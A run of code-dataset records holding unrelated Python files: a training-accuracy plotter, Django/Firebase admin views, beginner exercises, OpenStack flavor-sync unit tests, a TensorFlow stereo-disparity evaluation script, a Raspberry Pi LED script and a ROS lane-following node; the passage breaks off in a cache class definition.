math\n\nprint(\"Filename:\")\n#filename = input()\nfilename = \"accuracy\"\nlog_dir = \"C:/GamesTech/3rd-year/CCTP/EMG-interpreter/EMG-Interpreter/logs/\"\nfile_address = log_dir + filename + \".txt\"\n\nprint(\"Processing...\")\nhighest = 0;\ntrain = []\ntest = []\nwith open(file_address) as f:\n points = f.read().split()\n for i in range(int(len(points)/2)):\n train_i_acc = float(points[2*i])\n test_i_acc = float(points[2*i + 1])\n train.append(train_i_acc)\n test.append(test_i_acc)\n if(train_i_acc > highest) :\n highest = train_i_acc\n if(test_i_acc > highest) :\n highest = test_i_acc\n\n# round up to 0.5\nif(highest<= 0.1) :\n highest = 0.1\nelse:\n highest *= 2\n highest = math.ceil(highest)\n highest /= 2\n \n\nlength = len(train) * 2\nif(length < 1300):\n length = 1300\nplt.figure(figsize=(length/96, 800/96), dpi=96)\nplt.tight_layout()\nplt.axis([0, len(train)-1, 0, highest + .01])\nplt.plot(train, 'y-')\nplt.plot(test, 'b-')\nplt.legend([\"Training accuracy\", \"Test accuracy\"])\nplt.ylabel(\"Accuracy\")\nplt.xlabel(\"Epoch\")\nplt.savefig(\"log_graphs/\" + filename + \".png\", bbox_inches='tight')\nplt.close()\n\nprint(\"Complete\")","sub_path":"Py/draw_acc_log.py","file_name":"draw_acc_log.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"85270497","text":"import os\nimport random\nimport string\n\nimport datetime\nfrom django.contrib import auth as adminatuh\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse, JsonResponse\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\n\nfrom .forms import EventForm, AddMediaForm\n\nimport firebase_admin\nfrom firebase_admin import credentials, auth, firestore, messaging, storage, db as realtime\n\ncred = credentials.Certificate(\"test.json\")\nfirebase_admin.initialize_app(cred,{\n 'storageBucket': '',\n 'databaseURL': ''\n})\ndb = firestore.client()\nbucket = storage.bucket()\nref = realtime.reference('status')\n\n\n\ndef loginView(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = adminatuh.authenticate(username=username,password=password)\n if user is not None:\n adminatuh.login(request,user)\n return redirect('/')\n else:\n return redirect('login')\n return render(request,'login.html')\n\ndef logoutView(request):\n adminatuh.logout(request)\n return redirect('login')\n\n\n@login_required(login_url='login')\ndef index(request):\n users = auth.list_users().iterate_all()\n events = db.collection('events').get()\n finalUser = []\n for user in users:\n finalUser.append(user.uid)\n context = {\n \"users\": len(finalUser),\n \"events\": len(events)\n } \n return render(request, 'home.html', context)\n\n@login_required(login_url='login')\ndef addEvent(request):\n form = EventForm()\n if request.method == 'POST':\n form = EventForm(request.POST, request.FILES)\n if form.is_valid():\n imagePath = request.FILES['file']\n blob = bucket.blob(str(imagePath))\n blob.upload_from_file(imagePath, content_type='image/jpg')\n blob.make_public()\n # print(imagePath)\n db.collection('events').document().set({\n \"eventName\": form.cleaned_data.get('eventname'),\n \"eventLocation\": form.cleaned_data.get('eventlocation'),\n \"eventDate\": form.cleaned_data.get('birthday'),\n \"eventMessage\": form.cleaned_data.get('eventmessage'),\n \"img\": blob.public_url,\n \"createdAt\": datetime.datetime.now()\n })\n messages.success(request, 'Added To Database')\n\n else:\n messages.success(request, 'Added')\n\n context = {\n \"form\": form,\n \"userslist\": auth.list_users().iterate_all()\n }\n return render(request, 'addevent.html', context)\n\n\n@login_required(login_url='login')\ndef eventList(request):\n dataN = db.collection('events')\n qs = dataN.order_by(\n u'createdAt', direction=firestore.Query.DESCENDING)\n events = qs.stream()\n context = {\n \"data\": events\n }\n return render(request, 'eventlist.html', context)\n\n\n@login_required(login_url='login')\ndef bookingList(request):\n dataN = db.collection('bookings')\n qs = dataN.order_by(\n u'createdAt', direction=firestore.Query.DESCENDING)\n bookings = qs.stream()\n context = {\n \"data\": bookings\n }\n return render(request, 'bookings.html', context)\n\n\n@login_required(login_url='login')\ndef deleteEvent(request, pk):\n db.collection('events').document(pk).delete()\n return redirect('eventlist')\n\n\n@login_required(login_url='login')\ndef usersList(request):\n if request.method == 'POST':\n getStatus = request.POST.get('status')\n getuserId = request.POST.get('userid')\n setStatus = ref.child(getuserId)\n setStatus.set({\n \"key\": getuserId,\n \"value\": getStatus\n })\n###########################################################################################################################\n obj = ref.get()\n context = {\n \"data\": db.collection('users').get(),\n \"activestatus\": obj\n }\n return render(request, 'users.html', context)\n\n\n@login_required(login_url='login')\ndef deleteuser(request, uid):\n # auth.delete_user(uid)\n finuser = auth.list_users().iterate_all()\n for user in finuser:\n if user.email == uid:\n auth.delete_user(user.uid)\n db.collection('users').document(uid).delete()\n return redirect('users')\n\n\n@login_required(login_url='login')\ndef deleteBooking(request, uid):\n db.collection('bookings').document(uid).delete()\n return redirect('bookinglist')\n\n\n# media upod view\n@login_required(login_url='login')\ndef mediaUploadView(request):\n form = AddMediaForm()\n if request.method == 'POST':\n form = AddMediaForm(request.POST, request.FILES)\n if form.is_valid():\n extesionss, ext = os.path.splitext(str(request.FILES['file']))\n imagePath = request.FILES['file']\n letters = string.ascii_lowercase\n result_str = ''.join(random.choice(letters) for i in range(0,5))\n blob = bucket.blob(result_str + str(imagePath))\n blob.upload_from_file(imagePath, content_type=ext)\n blob.make_public()\n # print('hiiiiiiiiii',blob.public_url)\n # print(form.cleaned_data.get('mediaUrl'))\n\n db.collection('media').document().set({\n \"img\": blob.public_url,\n \"type\": ext\n })\n \n print(form.errors)\n # else:\n # print('erros')\n context = {\n \"form\": form\n }\n return render(request, 'media.html', context)\n\n# media upod view\n@login_required(login_url='login')\ndef mediaUploadYoutubeView(request):\n if request.method == 'POST':\n db.collection('media').document().set({\n \"img\": request.POST.get('mediaUrl'),\n \"type\": 'ytVideo'\n })\n return render(request, 'yt.html')\n\n\n@login_required(login_url=\"login\")\ndef mediaView(request):\n data = db.collection('media').get()\n if request.method == 'POST':\n getID = request.POST.get('docid')\n getobj = request.POST.get('obj')\n try:\n db.collection('media').document(getID).delete()\n x = getobj.rsplit('/', 1)\n bucket.blob(x[1]).delete()\n return redirect('gallery')\n except:\n pass\n\n context = {\n \"data\": data\n }\n return render(request, 'mediaview.html', context)\n\n\n@login_required(login_url='login')\ndef mediaDeleteView(request, id):\n if request.method == 'POST':\n getobj = request.POST.get('obj')\n x = getobj.split('/')\n print(x)\n # bucket.file().delete(id)\n return HttpResponse('done')\n\n\n@login_required(login_url='login')\ndef SendMsg(request):\n usersList = db.collection('users').get()\n registration_token = ''\n if request.method == 'POST':\n uids = request.POST.get('userid')\n device = request.POST.get('device')\n title = request.POST.get('title')\n msg = request.POST.get('message')\n frm = request.POST.get('from')\n for user in usersList:\n if user.to_dict()['uid'] == uids:\n registration_token += user.to_dict()['key']\n print(user.to_dict()['key'])\n if user.to_dict()['device'] == \"android\":\n message = messaging.Message(\n android=messaging.AndroidConfig(\n ttl=datetime.timedelta(seconds=3600),\n priority='normal',\n notification=messaging.AndroidNotification(\n title= title,\n body= msg\n ),\n ), \n token=registration_token,\n )\n else:\n message = messaging.Message(\n apns=messaging.APNSConfig(\n headers={'apns-priority': '10'},\n payload=messaging.APNSPayload(\n aps=messaging.Aps(\n alert=messaging.ApsAlert(\n title=title,\n body=msg\n ),\n badge=42,\n ),\n ),\n ),\n token=registration_token,\n )\n \n response = messaging.send(message)\n print(response)\n # [START apns_message]\n \n # [END apns_message]\n # return message\n\n db.collection('notification').document().set({\n \"userid\": uids,\n \"from\": frm,\n \"title\": title,\n \"message\": msg,\n \"createdAt\": datetime.datetime.now()\n })\n # Response is a message ID string.\n context = {\n \"userslist\": usersList\n }\n return render(request, 'notify.html', context)\n\n\nlogin_required(login_url='login')\ndef notifyListView(request, *args, **kwargs):\n dataN = db.collection('notification')\n qs = dataN.order_by(\n u'createdAt', direction=firestore.Query.DESCENDING)\n noti = qs.stream()\n context = {\n \"data\": noti,\n \"fewUsers\": db.collection('users').get()\n }\n return render(request, 'notifyview.html', context)\n\n\nlogin_required(login_url='login')\ndef notifydeletetView(request, uid):\n db.collection('notification').document(uid).delete()\n return redirect('noifyview')\n\n\nlogin_required(login_url='login')\ndef editUser(request, uid):\n data = db.collection('users').get()\n final = []\n docId = ''\n for user in data:\n if user.to_dict()['uid'] == uid:\n final.append(user)\n docId = user.id\n if request.method == 'POST':\n user = request.POST.get('username')\n userphone = request.POST.get('userphone')\n db.collection('users').document(str(docId)).update({\n \"name\": user,\n \"phone\": userphone\n })\n return redirect('users')\n context = {\n \"data\": final\n }\n return render(request, 'editUser.html', context)\n","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"306489379","text":"# + - 번갈아가며 출력하기\n\n# print('+와 -를 번갈아가며 출력합니다.')\n# n = int(input('몇 개를 출력할까요?(정수값입력) : '))\n\n# for i in range(n // 2):\n# print('+-', end='')\n\n# if n % 2:\n# print('+', end='')\n\n# *를 n개 출력하되 w개마다 줄바꿈 하기.\n\nn, w = 14, 5\n\nfor i in range(n // w):\n print('*' * w)\n\nrest = n % w\nif rest:\n print('*' * rest)","sub_path":"Practice_Algorithm/plusMinus.py","file_name":"plusMinus.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"419513623","text":"import json\nimport flavorsync.test.util as util\n\nfrom novaclient.v2.flavors import Flavor as OpenStackFlavor\n\nfrom flavorsync.model import Infrastructure, Flavor, FlavorCollection\n\ndef deserialize_xml_infrastructure_test():\n data = util.load_clean_xml_payload('infrastructure_request.xml')\n infrastructure = Infrastructure.deserialize(util.XML_MIMETYPE, data)\n _check_infrastructure_model_contents(infrastructure)\n\ndef deserialize_json_infrastructure_test():\n data = util.load_json_from_file('infrastructure_request.json')\n infrastructure = Infrastructure.deserialize(util.JSON_MIMETYPE, json.dumps(data))\n _check_infrastructure_model_contents(infrastructure)\n \ndef deserialize_wrong_mimetype_infrastructure_test():\n data = util.load_json_from_file('infrastructure_request.json')\n \n try:\n Infrastructure.deserialize(util.WRONG_MIMETYPE, data)\n assert False\n except NotImplementedError as e:\n assert 'Unrecognized mimetype or model type' in str(e)\n \n \ndef serialize_xml_infrastructure_test():\n data = util.load_clean_xml_payload('infrastructure_response.xml')\n \n infrastructure = util.create_example_infrastructure()\n \n infrastructure_xml = infrastructure.serialize(util.XML_MIMETYPE).decode('utf-8')\n assert infrastructure_xml in data\n \ndef serialize_json_infrastructure_test():\n file_json = util.load_json_from_file('infrastructure_response.json')\n \n infrastructure = util.create_example_infrastructure()\n \n infrastructure_json = infrastructure.serialize(util.JSON_MIMETYPE)\n assert util.json_are_equal(infrastructure_json, file_json)\n \ndef serialize_wrong_mimetype_infrastructure_test():\n infrastructure = util.create_example_infrastructure()\n \n try:\n infrastructure.serialize(util.WRONG_MIMETYPE)\n assert False\n except NotImplementedError as e:\n assert 'Unrecognized mimetype or model type' in str(e)\n \ndef infrastructure_to_content_dict_test():\n infrastructure = util.create_example_infrastructure()\n assert 'Mordor' in infrastructure._to_content_dict()\n \ndef infrastructure_to_dict_test():\n expected_dict = {\"infrastructure\": {\"name\" : \"Mordor\"}}\n infrastructure = util.create_example_infrastructure()\n assert expected_dict == infrastructure.to_dict()\n\n\n\n\ndef deserialize_xml_flavor_test():\n data = util.load_clean_xml_payload('flavor_creation_request.xml')\n flavor = Flavor.deserialize(util.XML_MIMETYPE, data)\n _check_flavor_model_contents(flavor)\n\ndef deserialize_json_flavor_test():\n data = util.load_json_from_file('flavor_creation_request.json')\n flavor = Flavor.deserialize(util.JSON_MIMETYPE, json.dumps(data))\n _check_flavor_model_contents(flavor)\n \ndef deserialize_wrong_mimetype_flavor_test():\n data = util.load_json_from_file('flavor_creation_request.json')\n \n try:\n Flavor.deserialize(util.WRONG_MIMETYPE, data)\n assert False\n except NotImplementedError as e:\n assert 'Unrecognized mimetype or model type' in str(e)\n \ndef serialize_xml_flavor_test():\n data = util.load_clean_xml_payload('flavor_response.xml')\n \n flavor = util.create_example_flavor()\n \n flavor_xml = flavor.serialize(util.XML_MIMETYPE).decode('utf-8')\n assert flavor_xml in data\n \ndef serialize_json_flavor_test():\n file_json = util.load_json_from_file('flavor_response.json')\n \n flavor = util.create_example_flavor()\n \n flavor_json = flavor.serialize(util.JSON_MIMETYPE)\n assert util.json_are_equal(flavor_json, file_json)\n \ndef serialize_wrong_mimetype_flavor_test():\n flavor = util.create_example_flavor()\n \n try:\n flavor.serialize(util.WRONG_MIMETYPE)\n assert False\n except NotImplementedError as e:\n assert 'Unrecognized mimetype or model type' in str(e)\n \ndef flavor_to_content_dict_test():\n data = util.load_json_from_file('flavor_response.json')\n \n flavor = util.create_example_flavor()\n \n assert util.json_are_equal(data['flavor'], flavor._to_content_dict())\n \ndef flavor_to_dict_test():\n expected_dict = util.load_json_from_file('flavor_response.json')\n \n flavor = util.create_example_flavor()\n \n assert util.json_are_equal(expected_dict, flavor.to_dict())\n \ndef from_openstack_flavor_test():\n data = util.load_json_from_file('flavor_response.json')\n openstackflavor = OpenStackFlavor(None, data['flavor'])\n \n infrastructure = util.create_example_infrastructure()\n \n flavor = util.create_example_flavor()\n \n converted_flavor = Flavor.from_openstack_flavor(openstackflavor, infrastructure)\n \n assert util.json_are_equal(flavor.to_dict(), converted_flavor.to_dict())\n\n\n\n\ndef serialize_xml_flavor_collection_test():\n data = util.load_clean_xml_payload('flavor_collection_response.xml')\n \n flavor_collection = util.create_example_flavor_collection()\n \n flavor_collection_xml = flavor_collection.serialize(util.XML_MIMETYPE).decode('utf-8')\n assert flavor_collection_xml in data\n \ndef serialize_xml_empty_flavor_collection_test():\n data = ''\n data += ''\n \n flavor_collection = FlavorCollection([])\n \n flavor_collection_xml = flavor_collection.serialize(util.XML_MIMETYPE).decode('utf-8')\n assert flavor_collection_xml in data\n \ndef serialize_json_flavor_collection_test():\n file_json = util.load_json_from_file('flavor_collection_response.json')\n \n flavor_collection = util.create_example_flavor_collection()\n \n flavor_collection_json = flavor_collection.serialize(util.JSON_MIMETYPE)\n assert util.json_are_equal(flavor_collection_json, file_json)\n \ndef serialize_json_empty_flavor_collection_test():\n data = '{\"flavors\":[]}'\n \n flavor_collection = FlavorCollection([])\n \n flavor_collection_json = flavor_collection.serialize(util.JSON_MIMETYPE)\n assert util.json_are_equal(flavor_collection_json, data)\n \ndef serialize_wrong_mimetype_flavor_collection_test():\n flavor_collection = util.create_example_flavor_collection()\n \n try:\n flavor_collection.serialize(util.WRONG_MIMETYPE)\n assert False\n except NotImplementedError as e:\n assert 'Unrecognized mimetype or model type' in str(e)\n \ndef flavor_collection_to_dict_test():\n expected_dict = util.load_json_from_file('flavor_collection_response.json')\n \n flavor_collection = util.create_example_flavor_collection()\n \n assert util.json_are_equal(expected_dict, flavor_collection.to_dict())\n \ndef emtpy_flavor_collection_to_dict_test():\n expected_dict = {\"flavors\":[]}\n \n flavor_collection = FlavorCollection([])\n \n assert util.json_are_equal(expected_dict, flavor_collection.to_dict())\n \ndef from_openstack_flavor_list_test():\n data = util.load_json_from_file('flavor_collection_response.json')\n \n for flavor in data['flavors']:\n del(flavor['nodes'])\n \n openstackflavors = [OpenStackFlavor(None, data['flavors'][0]),\n OpenStackFlavor(None, data['flavors'][1])]\n \n mordor = util.create_example_infrastructure()\n \n flavor_collection = util.create_example_flavor_collection(mordor)\n for flavor in flavor_collection.flavors:\n flavor.public = False\n \n converted_collection = FlavorCollection.from_openstack_flavor_list(\n openstackflavors, mordor)\n \n assert util.json_are_equal(\n flavor_collection.to_dict(), converted_collection.to_dict())\n \ndef from_empty_openstack_flavor_list_test():\n mordor = util.create_example_infrastructure()\n \n flavor_collection = FlavorCollection([])\n \n converted_collection = FlavorCollection.from_openstack_flavor_list(\n [], mordor)\n \n assert util.json_are_equal(\n flavor_collection.to_dict(), converted_collection.to_dict())\n \ndef flavor_collection_extend_list_test():\n flavor1 = util.create_example_flavor()\n flavor2 = util.create_secondary_example_flavor()\n \n flavor_collection1 = FlavorCollection([])\n flavor_collection2 = FlavorCollection([flavor1])\n flavor_collection3 = FlavorCollection([flavor2])\n \n flavors = [flavor1]\n flavor_collection1.extend(flavor_collection2)\n \n assert flavor_collection1.flavors == flavors\n \n flavors = [flavor1, flavor2]\n flavor_collection1.extend(flavor_collection3)\n \n assert flavor_collection1.flavors == flavors\n\ndef _check_infrastructure_model_contents(model):\n expected_infrastructure = util.create_example_infrastructure()\n \n assert expected_infrastructure.name in model.name\n assert expected_infrastructure.keystone_url in model.keystone_url\n assert expected_infrastructure.username in model.username\n assert expected_infrastructure.password in model.password\n assert expected_infrastructure.tenant in model.tenant\n\ndef _check_flavor_model_contents(model):\n expected_flavor = util.create_example_flavor()\n \n assert expected_flavor.name in model.name\n assert expected_flavor.vcpus == model.vcpus\n assert expected_flavor.ram == model.ram\n assert expected_flavor.disk == model.disk\n assert expected_flavor.swap == model.swap","sub_path":"flavorsync/test/model_unit_tests.py","file_name":"model_unit_tests.py","file_ext":"py","file_size_in_byte":9320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"403003443","text":"import sys\r\nimport io\r\nimport requests, json\r\n\r\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\r\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\r\n\r\n\r\ns= requests.Session()\r\n\r\n\r\nr= s.get('http://httpbin.org/stream/20', stream=True)\r\n#print(r.text)\r\n#print(r.encoding) #인코딩이 어떤것으로 되어있는지 확인\r\n#print(r.json()) #json인가 확인하는 코딩문\r\n\r\nif r.encoding is None:\r\n r.encoding = 'utf-8'\r\n\r\nfor line in r.iter_lines(decode_unicode=True):\r\n #print(line)\r\n b =json.loads(line) #dict 임\r\n for e in b.keys():\r\n print(\"key:\",e,\"values:\",b[e])\r\n","sub_path":"section3/download3-2-3.py","file_name":"download3-2-3.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"630802055","text":"# Copyright 2015 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"\nEvaluation for GC-Net on KITTI.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom datetime import datetime\nimport math\nimport time\nimport os\nimport numpy as np\nimport tensorflow as tf\n\nimport gcnet_model\nimport image_processing_KITTI\nfrom KITTI_data import KITTIData\n#from tensorflow.python import debug as tf_debug\n\nFLAGS = tf.app.flags.FLAGS\nBATCH_SIZE = 1\n#NUM_EVAL_SAMPLES = 4843\n\n#tf.app.flags.DEFINE_string('dataset', 'KITTI', '')\ntf.app.flags.DEFINE_string('mode', 'eval', 'mode')\ntf.app.flags.DEFINE_boolean('debug', False,\n \"\"\"Whether to show verbose summaries.\"\"\")\ntf.app.flags.DEFINE_string('log_root', '/home/laoreja/tf/log/kitti_from_retrain_6',\n \"\"\"Directory where to write event logs' parent.\"\"\")\ntf.app.flags.DEFINE_string('checkpoint_dir', '/home/laoreja/tf/log/kitti_from_retrain_6/train',\n \"\"\"Directory where to read model checkpoints.\"\"\")\ntf.app.flags.DEFINE_integer('eval_interval_secs', 60 * 5,\n \"\"\"How often to run the eval.\"\"\")\ntf.app.flags.DEFINE_boolean('run_once', True,\n \"\"\"Whether to run eval only once.\"\"\")\n\n\ndef eval_once(saver, summary_writer, op_list, summary_op):\n \"\"\"Run Eval once.\n\n Args:\n saver: Saver.\n summary_writer: Summary writer.\n op_list: List of ops for evaluation. Need computing the average of each of them.\n summary_op: Summary op.\n \"\"\"\n len_op_list = len(op_list)\n with tf.Session(config=tf.ConfigProto(allow_soft_placement = True)) as sess:\n ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n # Restores from checkpoint\n tf.logging.info('restore from %s' % ckpt.model_checkpoint_path)\n saver.restore(sess, ckpt.model_checkpoint_path)\n # Assuming model_checkpoint_path looks something like:\n # /my-favorite-path/cifar10_train/model.ckpt-0,\n # extract global_step from it.\n global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]\n else:\n print('No checkpoint file found')\n return\n\n # Start the queue runners.\n coord = tf.train.Coordinator()\n try:\n threads = []\n for qr in tf.get_collection(tf.GraphKeys.QUEUE_RUNNERS):\n threads.extend(qr.create_threads(sess, coord=coord, daemon=True,\n start=True))\n tf.logging.info('starts evaluation!')\n\n num_iter = NUM_EVAL_SAMPLES\n avg_list = [0.0 for i in range(len_op_list)]\n step = 0\n while step < num_iter and not coord.should_stop():\n res_list = sess.run(op_list)\n for i in range(len_op_list):\n avg_list[i] += res_list[i]\n step += 1\n print(res_list)\n \n if step % 50 == 0:\n# print('step: ', step, res_list)\n summary_str = sess.run(summary_op)\n summary_writer.add_summary(summary_str, step)\n\n # Compute averages of evaluating criteria\n for i in range(len_op_list):\n avg_list[i] /= (num_iter * 1.0)\n \n print('avg res:', avg_list)\n\n# summary = tf.Summary()\n# summary.ParseFromString(sess.run(summary_op))\n \n# for i in range(len_op_list):\n# summary.value.add(tag='avg_'+str(i), simple_value=avg_list[i])\n except Exception as e: # pylint: disable=broad-except\n coord.request_stop(e)\n\n coord.request_stop()\n coord.join(threads, stop_grace_period_secs=10)\n\n\ndef evaluate(hps, dataset):\n \"\"\"Eval for a number of steps.\"\"\"\n with tf.Graph().as_default() as g:\n # Get inputs. You may write them to summary.\n num_preprocess_threads = FLAGS.num_preprocess_threads\n left_images, right_images, disparitys, masks = image_processing_KITTI.inputs(\n dataset,\n batch_size = hps.batch_size,\n num_preprocess_threads=num_preprocess_threads)\n tf.summary.image('left_image', left_images)\n tmp = tf.expand_dims(disparitys, axis=3)\n tf.summary.image('disparity', tmp)\n tmp = tf.expand_dims(masks, axis=3)\n tf.summary.image('masks', tmp)\n tf.summary.image('masked_disparity', tf.expand_dims(disparitys * masks, axis=3))\n\n # Build a Graph that computes the disparity predictions from the\n # inference model.\n model = gcnet_model.GCNet(hps, left_images, right_images, disparitys, masks, 'eval') # \n model.build_graph_to_loss()\n\n # Restore the moving average version of the learned variables for eval.\n# variable_averages = tf.train.ExponentialMovingAverage(\n# gcnet_model.MOVING_AVERAGE_DECAY)\n# variables_to_restore = variable_averages.variables_to_restore()\n# saver = tf.train.Saver(variables_to_restore)\n saver = tf.train.Saver()\n\n # Build the summary operation based on the TF collection of Summaries.\n tf.summary.image('predict', tf.expand_dims(model.predicted_disparity, axis=3)) \n tf.summary.image('masked_predict', tf.expand_dims(model.predicted_disparity * masks, axis=3))\n summary_op = tf.summary.merge_all()\n\n summary_writer = tf.summary.FileWriter(FLAGS.eval_dir, g)\n\n while True:\n eval_once(saver, summary_writer, [model.abs_loss, model.larger_than_3px, model.larger_than_5px, model.larger_than_7px], summary_op)\n if FLAGS.run_once:\n break\n time.sleep(FLAGS.eval_interval_secs)\n\n\ndef main(argv=None): # pylint: disable=unused-argument\n\n dataset = KITTIData('train')\n assert dataset.data_files()\n global NUM_EVAL_SAMPLES\n NUM_EVAL_SAMPLES = dataset.num_examples_per_epoch()\n \n FLAGS.eval_dir = os.path.join(FLAGS.log_root, 'train_eval')\n \n if tf.gfile.Exists(FLAGS.eval_dir):\n tf.gfile.DeleteRecursively(FLAGS.eval_dir)\n tf.gfile.MakeDirs(FLAGS.eval_dir)\n\n# Indeed, the lrn_rate and weight_decay_rate have no use.\n hps = gcnet_model.HParams(batch_size=BATCH_SIZE,\n lrn_rate=0.0,\n weight_decay_rate=0.0,\n relu_leakiness=0.1,\n optimizer='RMSProp',\n max_disparity=192) \n\n evaluate(hps, dataset)\n\n\nif __name__ == '__main__':\n tf.logging.set_verbosity(tf.logging.DEBUG) \n tf.app.run()\n","sub_path":"reimplement_GC_Net/gcnet_eval_kitti.py","file_name":"gcnet_eval_kitti.py","file_ext":"py","file_size_in_byte":6921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"134357640","text":"import RPi.GPIO as GPIO \n\nimport time \nimport time\nimport serial\nimport binascii\n\n \n\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setwarnings(False) \n\n# Pin Numbers\nred_led = 18\ngreen_led = 24\nblue_led = 25\n\n# Set pins to output mode\nGPIO.setup(red_led, GPIO.OUT)\nGPIO.setup(green_led, GPIO.OUT)\nGPIO.setup(blue_led, GPIO.OUT)\n\nwhile True:\n #RED LED\n GPIO.output(red_led,GPIO.HIGH)\n time.sleep(1)\n GPIO.output(red_led,0)\n #GREEN LED\n GPIO.output(green_led,GPIO.HIGH)\n time.sleep(1)\n GPIO.output(green_led,0)\n #BLUE LED\n GPIO.output(blue_led,GPIO.HIGH)\n time.sleep(1)\n GPIO.output(blue_led,0)\n\nGPIO.cleanup()\n\n","sub_path":"pi/Desktop/SRTS_Code/LEDStrip.py","file_name":"LEDStrip.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"443758524","text":"# Write a function called return_day, this function takes in one parameter (a number from 1-7) and returns the day of the week. If the Number is less than 1 or greater than 7, the function should return None\n# Way_01\ndef return_day(num):\n\tdays = [\"Sunday\",\"Monday\", \"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\"]\n\t# Check to see if num is valid\n\tif num > 0 and num < len(days):\n\t\treturn days[num-1]\n\treturn None\nprint(return_day(5)) # Thursday\n# Way_02\ndef return_day(num):\n\ttry:\n\t\treturn [\"Sunday\",\"Monday\", \"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\"][num-1]\n\texcept IndexError as e:\n\t\treturn None\nprint(return_day(7)) # Saturday\nprint(return_day(6)) # Friday","sub_path":"Basics/41_Functions_Ex_01.py","file_name":"41_Functions_Ex_01.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"203931346","text":"#drive_one_line\n\n#!/usr/bin/env python\nimport rospy\nfrom math import sqrt\nfrom math import radians\nimport math\nfrom std_msgs.msg import String\nfrom std_msgs.msg import Float32\nfrom std_msgs.msg import Int16MultiArray\nfrom nav_msgs.msg import Odometry\nfrom std_msgs.msg import UInt8\nfrom std_msgs.msg import Int16\nimport time\n\n\n# from line_detection import CarPosition\n\n\nepsilon = 0.05\nspeed_rpm = 200\nangle_straight = 90\nangle_left = 20\nangle_right = 20\n\ncallbackCnt = 0\ntimestamp = time.time()\n\noffsetAvg = 0\ncircleAvg = 0\noffsetNum = 0\nangleAvg = 0\nlast_odom = None\nis_active = False\n\ndef KP(num):\n return 0.35 * num\n\ndef callbackOdom(msg):\n global last_odom\n last_odom = msg\n\ndef callbackDriveOnLine(data):\n global callbackCnt\n global timestamp\n global offsetAvg\n global circleAvg\n global offsetNum\n\n if \"None\" in data.data:\n return\n\n recData = data.data.split(':')\n radius = math.log(int(recData[0]),2)\n print(\"Radius: {}\".format(data.data))\n\n #circleAvg\n offsetAvg += int(recData[1])\n offsetNum += 1\n angle = angle_straight\n\n if (time.time()-timestamp) >= 0.5:\n off = offsetAvg/offsetNum\n angle -= KP(0.5*off + 0.5*radius)\n print(\"angle: {}\".format(angle))\n pub_steering.publish(abs(angle))\n\n timestamp = time.time()\n\n offsetAvg=0\n offsetNum=0\n\n newSpeed = speed_rpm\n if radius >= 18:\n newSpeed = speed_rpm + 100\n print(\"New Speed {}\".format(newSpeed))\n pub_speed.publish(newSpeed)\n else:\n callbackCnt += 1\n\n\n\nrospy.init_node(\"line\", anonymous=True)\nrospy.Subscriber(\"/Offset\", String, callbackDriveOnLine)\n\nsub_odom = rospy.Subscriber(\"odom\", Odometry, callbackOdom, queue_size=10)\n\npub_back_left = rospy.Publisher(\n \"simple_drive_control/backward_left\",\n Float32,\n queue_size=10)\npub_back_right = rospy.Publisher(\n \"simple_drive_control/backward_right\",\n Float32,\n queue_size=10)\npub_back = rospy.Publisher(\n \"simple_drive_control/backward\",\n Float32,\n queue_size=10)\npub_forward = rospy.Publisher(\n \"simple_drive_control/forward\",\n Float32,\n queue_size=10)\npub_speed = rospy.Publisher(\n \"manual_control/speed\",\n Int16,\n queue_size=10)\npub_steering = rospy.Publisher(\n \"steering\",\n UInt8,\n queue_size=10)\npub_stop_start = rospy.Publisher(\n \"manual_control/stop_start\",\n Int16,\n queue_size=100)\npub_info = rospy.Publisher(\n \"simple_drive_control/info\",\n String,\n queue_size=10)\n\nrospy.spin()\n","sub_path":"tasks_wise1819/ub08/drive_one_line5.py","file_name":"drive_one_line5.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"469694116","text":"#!/usr/bin/env python\n# -*- coding:Utf-8 -*-\n\n#\n# Modules\n#\n\nimport collections\n\nimport logging\nlogger = logging.getLogger( \"base.Cache.CacheDict\" )\n\n#\n# Class\n#\n\nclass CacheDict( collections.OrderedDict ):\n\t\"\"\"\n\tCustom ordered dict for Cache\n\t\"\"\"\n\tdef 